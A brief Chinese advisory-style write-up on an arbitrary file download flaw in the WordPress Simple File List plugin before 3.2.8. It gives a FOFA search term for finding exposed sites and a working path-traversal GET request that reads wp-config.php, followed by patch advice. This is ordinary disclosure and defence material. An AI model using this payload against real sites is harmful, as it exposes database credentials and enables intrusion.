一、漏洞描述
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。
WordPress plugin The Simple File List 3.2.7及其之前版本存在安全漏洞,该漏洞源于~/includes/ee-downloader.php 文件中的 eeFile 参数缺少控制和过滤。攻击者利用该漏洞可以进行任意文件下载。
二、影响版本
WordPress Simple File List < 3.2.8
三、漏洞环境
fofa:Simple File List
四、漏洞复现
poc:
GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php
![](https://img-blog.csdnimg.cn/img_convert/4f8c82dfc8ac9f0d40420cfc7ebaf45f.png)
五、更新建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606